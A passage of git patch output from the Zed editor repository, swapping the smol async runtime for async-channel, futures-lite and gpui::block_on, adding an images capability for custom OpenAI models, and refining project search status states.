b/crates/recent_projects/src/remote_servers.rs index 77553791f87f75..f475baddd99376 100644 --- a/crates/recent_projects/src/remote_servers.rs +++ b/crates/recent_projects/src/remote_servers.rs @@ -12,7 +12,7 @@ use dev_container::{ use editor::Editor; use extension_host::ExtensionStore; -use futures::{FutureExt, channel::oneshot, future::Shared}; +use futures::{FutureExt, StreamExt as _, channel::oneshot, future::Shared}; use gpui::{ Action, AnyElement, App, ClickEvent, ClipboardItem, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task, @@ -31,7 +31,6 @@ use settings::{ RemoteProject, RemoteSettingsContent, Settings as _, SettingsStore, update_settings_file, watch_config_file, }; -use smol::stream::StreamExt as _; use std::{ borrow::Cow, collections::BTreeSet, diff --git a/crates/remote_server/Cargo.toml b/crates/remote_server/Cargo.toml index c6ce45ba1ce283..48c047252fe1e4 100644 --- a/crates/remote_server/Cargo.toml +++ b/crates/remote_server/Cargo.toml @@ -23,6 +23,7 @@ test-support = ["fs/test-support"] [dependencies] anyhow.workspace = true +async-channel.workspace = true askpass.workspace = true clap.workspace = true client.workspace = true diff --git a/crates/remote_server/src/server.rs b/crates/remote_server/src/server.rs index bc39e4635e9611..c0a6d6de1993b4 100644 --- a/crates/remote_server/src/server.rs +++ b/crates/remote_server/src/server.rs @@ -41,6 +41,7 @@ use rpc::proto::{self, Envelope, REMOTE_SERVER_PROJECT_ID}; use rpc::{AnyProtoClient, TypedEnvelope}; use settings::{Settings, SettingsStore, watch_config_file}; use smol::{ + Timer, channel::{Receiver, Sender}, io::AsyncReadExt, stream::StreamExt as _, @@ -181,7 +182,7 @@ fn init_logging_server(log_file_path: &Path) -> Result>> { .open(log_file_path) .context("Failed to open log file in append mode")?; - let (tx, rx) = smol::channel::unbounded(); + let (tx, rx) = async_channel::unbounded(); let target = Box::new(MultiWrite { file: 
log_file, @@ -472,6 +473,9 @@ pub fn execute_run( |task| { app.background_executor().spawn(task).detach(); }, + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), ); let log_rx = init_logging_server(&log_file)?; log::info!( @@ -727,6 +731,9 @@ pub(crate) fn execute_proxy( |task| { smol::spawn(task).detach(); }, + // we are running outside gpui + #[allow(clippy::disallowed_methods)] + |duration| FutureExt::map(Timer::after(duration), |_| ()), ); log::info!("starting proxy process. PID: {}", std::process::id()); @@ -755,7 +762,7 @@ pub(crate) fn execute_proxy( ); kill_running_server(pid, &server_paths)?; } - smol::block_on(spawn_server(&server_paths)).map_err(ExecuteProxyError::SpawnServer)?; + gpui::block_on(spawn_server(&server_paths)).map_err(ExecuteProxyError::SpawnServer)?; std::fs::read_to_string(&server_paths.pid_file) .and_then(|contents| { contents.parse::().map_err(|_| { @@ -826,7 +833,7 @@ pub(crate) fn execute_proxy( } }); - if let Err(forwarding_result) = smol::block_on(async move { + if let Err(forwarding_result) = gpui::block_on(async move { futures::select! 
{ result = stdin_task.fuse() => result.map_err(ExecuteProxyError::StdinTask), result = stdout_task.fuse() => result.map_err(ExecuteProxyError::StdoutTask), @@ -834,7 +841,7 @@ pub(crate) fn execute_proxy( } }) { log::error!("encountered error while forwarding messages: {forwarding_result:#}",); - if !matches!(smol::block_on(check_server_running(server_pid)), Ok(true)) { + if !matches!(gpui::block_on(check_server_running(server_pid)), Ok(true)) { log::error!("server exited unexpectedly"); return Err(ExecuteProxyError::ServerNotRunning( ProxyLaunchError::ServerNotRunning, diff --git a/crates/search/Cargo.toml b/crates/search/Cargo.toml index 4213aa39a046e9..dac98f5245f11e 100644 --- a/crates/search/Cargo.toml +++ b/crates/search/Cargo.toml @@ -27,6 +27,7 @@ bitflags.workspace = true collections.workspace = true editor.workspace = true fs.workspace = true +futures-lite.workspace = true futures.workspace = true gpui.workspace = true language.workspace = true @@ -36,7 +37,6 @@ project.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true theme.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/search/src/buffer_search.rs b/crates/search/src/buffer_search.rs index 8170d303eb8ca3..41dda49efa3224 100644 --- a/crates/search/src/buffer_search.rs +++ b/crates/search/src/buffer_search.rs @@ -1942,10 +1942,10 @@ mod tests { SELECTION_HIGHLIGHT_DEBOUNCE_TIMEOUT, SearchSettings, SelectionEffects, display_map::DisplayRow, test::editor_test_context::EditorTestContext, }; + use futures::stream::StreamExt as _; use gpui::{Hsla, TestAppContext, UpdateGlobal, VisualTestContext}; use language::{Buffer, Point}; use settings::{SearchSettingsContent, SettingsStore}; - use smol::stream::StreamExt as _; use unindent::Unindent as _; use util_macros::perf; diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index c79937ab7ad12f..6a092818a02bef 100644 --- 
a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -483,7 +483,7 @@ impl ProjectSearch { while let Some(new_ranges) = new_ranges.next().await { // `new_ranges.next().await` likely never gets hit while still pending so `async_task` // will not reschedule, starving other front end tasks, insert a yield point for that here - smol::future::yield_now().await; + futures_lite::future::yield_now().await; project_search .update(cx, |project_search, cx| { project_search.match_ranges.extend(new_ranges); diff --git a/crates/sidebar/Cargo.toml b/crates/sidebar/Cargo.toml index 97e09439800067..be525a5c6e5802 100644 --- a/crates/sidebar/Cargo.toml +++ b/crates/sidebar/Cargo.toml @@ -17,6 +17,7 @@ default = [] [dependencies] acp_thread.workspace = true action_log.workspace = true +async-channel.workspace = true agent.workspace = true agent-client-protocol.workspace = true agent_settings.workspace = true @@ -38,7 +39,6 @@ remote_connection.workspace = true serde.workspace = true serde_json.workspace = true settings.workspace = true -smol.workspace = true telemetry.workspace = true theme.workspace = true theme_settings.workspace = true diff --git a/crates/sidebar/src/sidebar.rs b/crates/sidebar/src/sidebar.rs index 80243a873baf47..ebf2518d68d05f 100644 --- a/crates/sidebar/src/sidebar.rs +++ b/crates/sidebar/src/sidebar.rs @@ -3407,7 +3407,7 @@ impl Sidebar { thread_id: Option, neighbor: Option<&ThreadMetadata>, thread_folder_paths: Option<&PathList>, - in_flight_archive: Option<(Task<()>, smol::channel::Sender<()>)>, + in_flight_archive: Option<(Task<()>, async_channel::Sender<()>)>, window: &mut Window, cx: &mut Context, ) { @@ -3498,12 +3498,12 @@ impl Sidebar { thread_id: ThreadId, roots: Vec, cx: &mut Context, - ) -> Option<(Task<()>, smol::channel::Sender<()>)> { + ) -> Option<(Task<()>, async_channel::Sender<()>)> { if roots.is_empty() { return None; } - let (cancel_tx, cancel_rx) = smol::channel::bounded::<()>(1); + let (cancel_tx, cancel_rx) 
= async_channel::bounded::<()>(1); let task = cx.spawn(async move |_this, cx| { match Self::archive_worktree_roots(roots, cancel_rx, cx).await { Ok(ArchiveWorktreeOutcome::Success) => { @@ -3530,7 +3530,7 @@ impl Sidebar { async fn archive_worktree_roots( roots: Vec, - cancel_rx: smol::channel::Receiver<()>, + cancel_rx: async_channel::Receiver<()>, cx: &mut gpui::AsyncApp, ) -> anyhow::Result { let mut completed_persists: Vec<(i64, thread_worktree_archive::RootPlan)> = Vec::new(); diff --git a/crates/sqlez/Cargo.toml b/crates/sqlez/Cargo.toml index 5f4a0bef67efe3..f5db6f96a0dfb6 100644 --- a/crates/sqlez/Cargo.toml +++ b/crates/sqlez/Cargo.toml @@ -16,7 +16,7 @@ indoc.workspace = true libsqlite3-sys.workspace = true log.workspace = true parking_lot.workspace = true -smol.workspace = true +pollster.workspace = true sqlformat.workspace = true thread_local = "1.1.4" util.workspace = true diff --git a/crates/sqlez/src/thread_safe_connection.rs b/crates/sqlez/src/thread_safe_connection.rs index 7b3630cdf65f90..1de70a06636b89 100644 --- a/crates/sqlez/src/thread_safe_connection.rs +++ b/crates/sqlez/src/thread_safe_connection.rs @@ -344,7 +344,7 @@ mod test { PRAGMA case_sensitive_like=TRUE; "}); - let _ = smol::block_on(builder.build()).unwrap().deref(); + let _ = pollster::block_on(builder.build()).unwrap().deref(); })); } diff --git a/crates/terminal/Cargo.toml b/crates/terminal/Cargo.toml index 1f6082e0bfcfec..ad1a0753f52e82 100644 --- a/crates/terminal/Cargo.toml +++ b/crates/terminal/Cargo.toml @@ -20,10 +20,12 @@ path = "src/terminal.rs" doctest = false [dependencies] +async-channel.workspace = true alacritty_terminal.workspace = true anyhow.workspace = true collections.workspace = true futures.workspace = true +futures-lite.workspace = true gpui.workspace = true itertools.workspace = true libc.workspace = true @@ -34,7 +36,6 @@ schemars.workspace = true serde.workspace = true settings.workspace = true sysinfo.workspace = true -smol.workspace = true 
task.workspace = true theme.workspace = true theme_settings.workspace = true diff --git a/crates/terminal/src/terminal.rs b/crates/terminal/src/terminal.rs index 74118d372d91cf..e47cc2bb8d0d21 100644 --- a/crates/terminal/src/terminal.rs +++ b/crates/terminal/src/terminal.rs @@ -26,6 +26,7 @@ use alacritty_terminal::{ }, }; use anyhow::{Context as _, Result, bail}; +use futures_lite::future::yield_now; use log::trace; use futures::{ @@ -39,12 +40,12 @@ use mappings::mouse::{ scroll_report, }; +use async_channel::{Receiver, Sender}; use collections::{HashMap, VecDeque}; use futures::StreamExt; use pty_info::{ProcessIdGetter, PtyProcessInfo}; use serde::{Deserialize, Serialize}; use settings::Settings; -use smol::channel::{Receiver, Sender}; use task::{HideStrategy, Shell, SpawnInTerminal}; use terminal_hyperlinks::RegexSearches; use terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; @@ -736,7 +737,7 @@ impl TerminalBuilder { } if events.is_empty() && !wakeup { - smol::future::yield_now().await; + yield_now().await; break 'outer; } @@ -749,7 +750,7 @@ impl TerminalBuilder { this.process_event(event, cx); } })?; - smol::future::yield_now().await; + yield_now().await; } } anyhow::Ok(()) @@ -2565,6 +2566,7 @@ mod tests { index::{Column, Line, Point as AlacPoint}, term::cell::Cell, }; + use async_channel::Receiver; use collections::HashMap; use gpui::{ Entity, Modifiers, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, @@ -2572,7 +2574,6 @@ mod tests { }; use parking_lot::Mutex; use rand::{Rng, distr, rngs::StdRng}; - use smol::channel::Receiver; use task::{Shell, ShellBuilder}; #[cfg(not(target_os = "windows"))] @@ -2591,7 +2592,7 @@ mod tests { command: &str, args: &[&str], ) -> (Entity, Receiver>) { - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let args: Vec = args.iter().map(|s| s.to_string()).collect(); let (program, args) = 
ShellBuilder::new(&Shell::System, false).build(Some(command.to_owned()), &args); @@ -2744,7 +2745,7 @@ mod tests { cx.executor().allow_parking(); - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let builder = cx .update(|cx| { TerminalBuilder::new( @@ -2770,7 +2771,7 @@ mod tests { // Build an empty command, which will result in a tty shell spawned. let terminal = cx.new(|cx| builder.subscribe(cx)); - let (event_tx, event_rx) = smol::channel::unbounded::(); + let (event_tx, event_rx) = async_channel::unbounded::(); cx.update(|cx| { cx.subscribe(&terminal, move |_, e, _| { event_tx.send_blocking(e.clone()).unwrap(); @@ -2841,7 +2842,7 @@ mod tests { .unwrap(); let terminal = cx.new(|cx| builder.subscribe(cx)); - let (event_tx, event_rx) = smol::channel::unbounded::(); + let (event_tx, event_rx) = async_channel::unbounded::(); cx.update(|cx| { cx.subscribe(&terminal, move |_, e, _| { event_tx.send_blocking(e.clone()).unwrap(); @@ -2876,7 +2877,7 @@ mod tests { async fn test_terminal_no_exit_on_spawn_failure(cx: &mut TestAppContext) { cx.executor().allow_parking(); - let (completion_tx, completion_rx) = smol::channel::unbounded(); + let (completion_tx, completion_rx) = async_channel::unbounded(); let (program, args) = ShellBuilder::new(&Shell::System, false) .build(Some("asdasdasdasd".to_owned()), &["@@@@@".to_owned()]); let builder = cx diff --git a/crates/workspace/Cargo.toml b/crates/workspace/Cargo.toml index 203980873d2915..0200f1b7d570e7 100644 --- a/crates/workspace/Cargo.toml +++ b/crates/workspace/Cargo.toml @@ -36,6 +36,7 @@ clock.workspace = true collections.workspace = true component.workspace = true db.workspace = true +futures-lite.workspace = true fs.workspace = true futures.workspace = true git.workspace = true diff --git a/crates/workspace/src/workspace.rs b/crates/workspace/src/workspace.rs index a6d966bb23fddc..8b54a995a87e07 100644 --- 
a/crates/workspace/src/workspace.rs +++ b/crates/workspace/src/workspace.rs @@ -17,7 +17,6 @@ mod persistence; pub mod searchable; mod security_modal; pub mod shared_screen; -use db::smol::future::yield_now; pub use shared_screen::SharedScreen; pub mod focus_follows_mouse; mod status_bar; @@ -3389,7 +3388,7 @@ impl Workspace { .unwrap_or(false); if focus_changed { - yield_now().await; + futures_lite::future::yield_now().await; } } diff --git a/crates/worktree/Cargo.toml b/crates/worktree/Cargo.toml index 6d8faad3dc495a..5aac6f24173def 100644 --- a/crates/worktree/Cargo.toml +++ b/crates/worktree/Cargo.toml @@ -31,6 +31,7 @@ test-support = [ [dependencies] anyhow.workspace = true +async-channel.workspace = true async-lock.workspace = true chardetng.workspace = true clock.workspace = true @@ -53,7 +54,6 @@ serde.workspace = true serde_json.workspace = true settings.workspace = true smallvec.workspace = true -smol.workspace = true sum_tree.workspace = true text.workspace = true tracing.workspace = true diff --git a/crates/worktree/src/worktree.rs b/crates/worktree/src/worktree.rs index 4a85e91c5a71a0..3f58448d312ae6 100644 --- a/crates/worktree/src/worktree.rs +++ b/crates/worktree/src/worktree.rs @@ -31,6 +31,7 @@ use gpui::{ use ignore::IgnoreStack; use language::{ByteContent, DiskState, FILE_ANALYSIS_BYTES, analyze_byte_content}; +use async_channel::{self, Sender}; use parking_lot::Mutex; use paths::{local_settings_folder_name, local_vscode_folder_name}; use postage::{ @@ -45,7 +46,6 @@ use rpc::{ pub use settings::WorktreeId; use settings::{Settings, SettingsLocation, SettingsStore}; use smallvec::{SmallVec, smallvec}; -use smol::channel::{self, Sender}; use std::{ any::Any, borrow::Borrow as _, @@ -127,8 +127,8 @@ impl fmt::Debug for LoadedBinaryFile { pub struct LocalWorktree { snapshot: LocalSnapshot, - scan_requests_tx: channel::Sender, - path_prefixes_to_scan_tx: channel::Sender, + scan_requests_tx: async_channel::Sender, + path_prefixes_to_scan_tx: 
async_channel::Sender, is_scanning: (watch::Sender, watch::Receiver), snapshot_subscriptions: VecDeque<(usize, oneshot::Sender<()>)>, _background_scanner_tasks: Vec>, @@ -483,8 +483,8 @@ impl Worktree { .block_on(snapshot.insert_entry(entry, fs.as_ref())); } - let (scan_requests_tx, scan_requests_rx) = channel::unbounded(); - let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = channel::unbounded(); + let (scan_requests_tx, scan_requests_rx) = async_channel::unbounded(); + let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = async_channel::unbounded(); let mut worktree = LocalWorktree { share_private_files, next_entry_id, @@ -1119,8 +1119,8 @@ impl LocalWorktree { } fn restart_background_scanners(&mut self, cx: &Context) { - let (scan_requests_tx, scan_requests_rx) = channel::unbounded(); - let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = channel::unbounded(); + let (scan_requests_tx, scan_requests_rx) = async_channel::unbounded(); + let (path_prefixes_to_scan_tx, path_prefixes_to_scan_rx) = async_channel::unbounded(); self.scan_requests_tx = scan_requests_tx; self.path_prefixes_to_scan_tx = path_prefixes_to_scan_tx; @@ -1138,8 +1138,8 @@ impl LocalWorktree { fn start_background_scanner( &mut self, - scan_requests_rx: channel::Receiver, - path_prefixes_to_scan_rx: channel::Receiver, + scan_requests_rx: async_channel::Receiver, + path_prefixes_to_scan_rx: async_channel::Receiver, cx: &Context, ) { let snapshot = self.snapshot(); @@ -3929,8 +3929,8 @@ struct BackgroundScanner { fs_case_sensitive: bool, status_updates_tx: UnboundedSender, executor: BackgroundExecutor, - scan_requests_rx: channel::Receiver, - path_prefixes_to_scan_rx: channel::Receiver, + scan_requests_rx: async_channel::Receiver, + path_prefixes_to_scan_rx: async_channel::Receiver, next_entry_id: Arc, phase: BackgroundScannerPhase, watcher: Arc, @@ -4035,7 +4035,7 @@ impl BackgroundScanner { Box::pin(futures::stream::pending()) }; - let (scan_job_tx, scan_job_rx) = 
channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); { let mut state = self.state.lock().await; state.snapshot.scan_id += 1; @@ -4494,7 +4494,7 @@ impl BackgroundScanner { self.state.lock().await.snapshot.scan_id += 1; - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); log::debug!( "received fs events {:?}", relative_paths @@ -4559,7 +4559,7 @@ impl BackgroundScanner { .await; (state.snapshot.clone(), ignore_stack, abs_path) }; - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); self.update_ignore_statuses_for_paths( scan_job_tx, prev_snapshot, @@ -4571,7 +4571,7 @@ impl BackgroundScanner { } async fn forcibly_load_paths(&self, paths: &[Arc]) -> bool { - let (scan_job_tx, scan_job_rx) = channel::unbounded(); + let (scan_job_tx, scan_job_rx) = async_channel::unbounded(); { let mut state = self.state.lock().await; let root_path = state.snapshot.abs_path.clone(); @@ -4614,7 +4614,7 @@ impl BackgroundScanner { async fn scan_dirs( &self, enable_progress_updates: bool, - scan_jobs_rx: channel::Receiver, + scan_jobs_rx: async_channel::Receiver, ) { if self .status_updates_tx @@ -5138,7 +5138,7 @@ impl BackgroundScanner { prev_snapshot: LocalSnapshot, ignores_to_update: Vec<(Arc, IgnoreStack)>, ) { - let (ignore_queue_tx, ignore_queue_rx) = channel::unbounded(); + let (ignore_queue_tx, ignore_queue_rx) = async_channel::unbounded(); { for (parent_abs_path, ignore_stack) in ignores_to_update { ignore_queue_tx diff --git a/crates/zed/src/main.rs b/crates/zed/src/main.rs index 627d514f6c469e..234179f9a53b7a 100644 --- a/crates/zed/src/main.rs +++ b/crates/zed/src/main.rs @@ -337,7 +337,7 @@ fn main() { session_id.clone(), KeyValueStore::from_app_db(&app_db), )); - + let background_executor = app.background_executor(); crashes::init( InitCrashHandler { session_id, @@ -358,6 +358,7 @@ fn main() { |task| { 
app.background_executor().spawn(task).detach(); }, + move |duration| background_executor.timer(duration), ); let (open_listener, mut open_rx) = OpenListener::new(); diff --git a/crates/zed/src/zed/visual_tests.rs b/crates/zed/src/zed/visual_tests.rs index 982db08782207a..610621f480f7bf 100644 --- a/crates/zed/src/zed/visual_tests.rs +++ b/crates/zed/src/zed/visual_tests.rs @@ -441,7 +441,7 @@ mod tests { let mut cx = VisualTestAppContext::new(gpui_platform::current_platform(false)); let app_state = init_visual_test(&mut cx); - smol::block_on(async { + gpui::block_on(async { app_state .fs .as_fake() @@ -456,7 +456,7 @@ mod tests { .await; }); - let workspace_result = smol::block_on(open_test_workspace(app_state, &mut cx)); + let workspace_result = gpui::block_on(open_test_workspace(app_state, &mut cx)); assert!( workspace_result.is_ok(), "Failed to open workspace: {:?}", @@ -482,7 +482,7 @@ mod tests { let mut cx = VisualTestAppContext::new(gpui_platform::current_platform(false)); let app_state = init_visual_test(&mut cx); - smol::block_on(async { + gpui::block_on(async { app_state .fs .as_fake() @@ -498,10 +498,10 @@ mod tests { .await; }); - let workspace = smol::block_on(open_test_workspace(app_state, &mut cx)) + let workspace = gpui::block_on(open_test_workspace(app_state, &mut cx)) .expect("Failed to open workspace"); - smol::block_on(async { + gpui::block_on(async { wait_for_ui_stabilization(&cx).await; let screenshot_result = cx.capture_screenshot(workspace.into()); From 67906ebdff4b21a9e50a3e55be3306de3e2031e2 Mon Sep 17 00:00:00 2001 From: Matt Van Horn Date: Fri, 24 Apr 2026 03:36:46 -0700 Subject: [PATCH 005/231] language_models: Honor images capability for custom OpenAI models (#54223) ## Summary Users who add custom OpenAI models under `language_models.openai.available_models` can set `capabilities.images: true` to declare that the endpoint accepts image inputs. 
Today, that setting is silently ignored: the Agent panel's image-attach button stays disabled regardless, and the only workaround is to switch to a built-in OpenAI model, attach the image, and switch back. Root cause: `Model::Custom` does not carry a `supports_images` field, and the OpenAI provider's `supports_images()` for the `Custom` arm hardcodes `false`. ## Changes 1. `crates/settings_content/src/language_model.rs`: add `images: bool` to `OpenAiModelCapabilities` with `#[serde(default)]` so existing settings.json files keep working unchanged. 2. `crates/open_ai/src/open_ai.rs`: add `supports_images: bool` to `Model::Custom` with a matching serde default. 3. `crates/language_models/src/provider/open_ai.rs`: pass `model.capabilities.images` into the `Model::Custom` variant in `provided_models`, and return the stored value from `supports_images()` for `Custom`. Existing `Model::Custom { .. }` match sites (`completion.rs:829`, various in `open_ai.rs`) all use `..` so they continue to compile without change. ## Testing - `cargo check -p settings_content -p open_ai -p language_models`: clean. - I was not able to complete `./script/clippy` locally: the build stalled on the first-time `webrtc-sys` download for livekit-rust-sdks (TLS close_notify failure on docs.rs mirror). Happy to rerun once CI has cached artifacts. - Manually verified the capability plumbing by tracing: settings.json -> `OpenAiModelCapabilities.images` -> `Model::Custom { supports_images }` -> `supports_images()` -> `Thread::prompt_capabilities` -> `SessionCapabilities.supports_images()` -> `build_add_context_menu` gate in `thread_view.rs`. ## Related Issues Closes #50752 Release Notes: - Fixed custom OpenAI models ignoring the `capabilities.images` setting in `language_models.openai.available_models`. This contribution was developed with AI assistance (Codex). 
--------- Co-authored-by: Matt Van Horn <455140+mvanhorn@users.noreply.github.com> --- crates/language_models/src/provider/open_ai.rs | 10 +++++----- crates/open_ai/src/open_ai.rs | 6 ++++++ crates/settings_content/src/language_model.rs | 3 +++ 3 files changed, 14 insertions(+), 5 deletions(-) diff --git a/crates/language_models/src/provider/open_ai.rs b/crates/language_models/src/provider/open_ai.rs index f5ee65c8d85ff6..97bb5ef1e4d64b 100644 --- a/crates/language_models/src/provider/open_ai.rs +++ b/crates/language_models/src/provider/open_ai.rs @@ -182,6 +182,7 @@ impl LanguageModelProvider for OpenAiLanguageModelProvider { max_completion_tokens: model.max_completion_tokens, reasoning_effort: model.reasoning_effort, supports_chat_completions: model.capabilities.chat_completions, + supports_images: model.capabilities.images, }, ); } @@ -328,11 +329,10 @@ impl LanguageModel for OpenAiLanguageModel { | Model::FivePointFourPro | Model::O1 | Model::O3 => true, - Model::ThreePointFiveTurbo - | Model::Four - | Model::FourTurbo - | Model::O3Mini - | Model::Custom { .. } => false, + Model::ThreePointFiveTurbo | Model::Four | Model::FourTurbo | Model::O3Mini => false, + Model::Custom { + supports_images, .. 
+ } => *supports_images, } } diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index 0109efbe293ee0..cc54d20a91568d 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -106,6 +106,8 @@ pub enum Model { reasoning_effort: Option, #[serde(default = "default_supports_chat_completions")] supports_chat_completions: bool, + #[serde(default = "default_supports_images")] + supports_images: bool, }, } @@ -113,6 +115,10 @@ const fn default_supports_chat_completions() -> bool { true } +const fn default_supports_images() -> bool { + true +} + impl Model { pub fn default_fast() -> Self { Self::FiveMini diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 635b58f988d6ad..c14f854a724ce6 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -257,12 +257,15 @@ pub struct OpenAiCompatibleSettingsContent { pub struct OpenAiModelCapabilities { #[serde(default = "default_true")] pub chat_completions: bool, + #[serde(default = "default_true")] + pub images: bool, } impl Default for OpenAiModelCapabilities { fn default() -> Self { Self { chat_completions: default_true(), + images: default_true(), } } } From 0ddb7e404ad500abb8866870e1da364042f8e662 Mon Sep 17 00:00:00 2001 From: Xiaobo Liu Date: Fri, 24 Apr 2026 18:40:20 +0800 Subject: [PATCH 006/231] editor: Make parse_blocks synchronous since it has no await points (#54756) Release Notes: - N/A Signed-off-by: Xiaobo Liu --- crates/editor/src/hover_popover.rs | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/crates/editor/src/hover_popover.rs b/crates/editor/src/hover_popover.rs index 24fdce51ba6379..e43ae09c0d6526 100644 --- a/crates/editor/src/hover_popover.rs +++ b/crates/editor/src/hover_popover.rs @@ -205,8 +205,7 @@ pub fn hover_at_inlay( let language_registry = project.read_with(cx, |p, _| p.languages().clone()); let blocks = 
vec![inlay_hover.tooltip]; - let parsed_content = - parse_blocks(&blocks, Some(&language_registry), None, cx).await; + let parsed_content = parse_blocks(&blocks, Some(&language_registry), None, cx); let scroll_handle = ScrollHandle::new(); @@ -494,8 +493,7 @@ fn show_hover( text: format!("Unicode character U+{:02X}", invisible as u32), kind: HoverBlockKind::PlainText, }]; - let parsed_content = - parse_blocks(&blocks, language_registry.as_ref(), None, cx).await; + let parsed_content = parse_blocks(&blocks, language_registry.as_ref(), None, cx); let scroll_handle = ScrollHandle::new(); let subscription = this .update(cx, |_, cx| { @@ -536,7 +534,7 @@ fn show_hover( let blocks = hover_result.contents; let language = hover_result.language; let parsed_content = - parse_blocks(&blocks, language_registry.as_ref(), language, cx).await; + parse_blocks(&blocks, language_registry.as_ref(), language, cx); let scroll_handle = ScrollHandle::new(); hover_highlights.push(range.clone()); let subscription = this @@ -623,7 +621,7 @@ fn same_diagnostic_hover(editor: &Editor, snapshot: &EditorSnapshot, anchor: Anc .unwrap_or(false) } -async fn parse_blocks( +fn parse_blocks( blocks: &[HoverBlock], language_registry: Option<&Arc>, language: Option>, From b11dc21d479515938a3916a0a528eb6636d46c6b Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Fri, 24 Apr 2026 13:45:16 +0300 Subject: [PATCH 007/231] project_search: Fix project search status text and refactor search state (#54753) This change fixes a small bug where we were showing "Loading project..." even when in fact we had already started the search. It also refactors three booleans in the `SearchState` enum, so that it's harder to make similar mistakes in the future. 
Release Notes: - N/A --- crates/agent/src/tools/grep_tool.rs | 2 +- .../tests/integration/integration_tests.rs | 2 +- crates/project/src/project_search.rs | 8 +- crates/project/src/search.rs | 1 + .../tests/integration/project_tests.rs | 3 +- crates/project_benchmarks/src/main.rs | 12 +- .../remote_server/src/remote_editing_tests.rs | 10 +- crates/search/src/project_search.rs | 125 +++++++++++------- 8 files changed, 99 insertions(+), 64 deletions(-) diff --git a/crates/agent/src/tools/grep_tool.rs b/crates/agent/src/tools/grep_tool.rs index 9ccebd80e85e48..485084a406e3f8 100644 --- a/crates/agent/src/tools/grep_tool.rs +++ b/crates/agent/src/tools/grep_tool.rs @@ -196,7 +196,7 @@ impl AgentTool for GrepTool { has_more_matches = true; break; } - Some(SearchResult::WaitingForScan) => continue, + Some(SearchResult::WaitingForScan | SearchResult::Searching) => continue, None => break, }; if ranges.is_empty() { diff --git a/crates/collab/tests/integration/integration_tests.rs b/crates/collab/tests/integration/integration_tests.rs index b7479f956249df..d5e4d046b4edb0 100644 --- a/crates/collab/tests/integration/integration_tests.rs +++ b/crates/collab/tests/integration/integration_tests.rs @@ -5295,7 +5295,7 @@ async fn test_project_search( "Unexpectedly reached search limit in tests. If you do want to assert limit-reached, change this panic call." 
) } - SearchResult::WaitingForScan => {} + SearchResult::WaitingForScan | SearchResult::Searching => {} }; } diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index 2db893538c837e..e865bb4d5cb6c7 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -424,8 +424,12 @@ impl Search { worktree.as_local().map(|local| local.scan_complete()) }); if let Some(scan_complete) = scan_complete { - _ = results_tx.send(SearchResult::WaitingForScan).await; - scan_complete.await; + let mut scan_complete = pin!(scan_complete); + if scan_complete.as_mut().now_or_never().is_none() { + _ = results_tx.send(SearchResult::WaitingForScan).await; + scan_complete.await; + _ = results_tx.send(SearchResult::Searching).await; + } } let (mut snapshot, worktree_settings) = worktree diff --git a/crates/project/src/search.rs b/crates/project/src/search.rs index b04bf1289741ed..83b4c585f1454e 100644 --- a/crates/project/src/search.rs +++ b/crates/project/src/search.rs @@ -26,6 +26,7 @@ pub enum SearchResult { }, LimitReached, WaitingForScan, + Searching, } #[derive(Clone, Copy, PartialEq)] diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 984d1de057c1d2..6997435eb2a215 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -12313,7 +12313,8 @@ async fn search( SearchResult::Buffer { buffer, ranges } => { results.entry(buffer).or_insert(ranges); } - SearchResult::LimitReached | SearchResult::WaitingForScan => {} + SearchResult::LimitReached | SearchResult::WaitingForScan | SearchResult::Searching => { + } } } Ok(results diff --git a/crates/project_benchmarks/src/main.rs b/crates/project_benchmarks/src/main.rs index cdeb8ed780ecea..054b5eb95a5627 100644 --- a/crates/project_benchmarks/src/main.rs +++ b/crates/project_benchmarks/src/main.rs @@ -210,11 +210,13 @@ fn main() -> Result<(), 
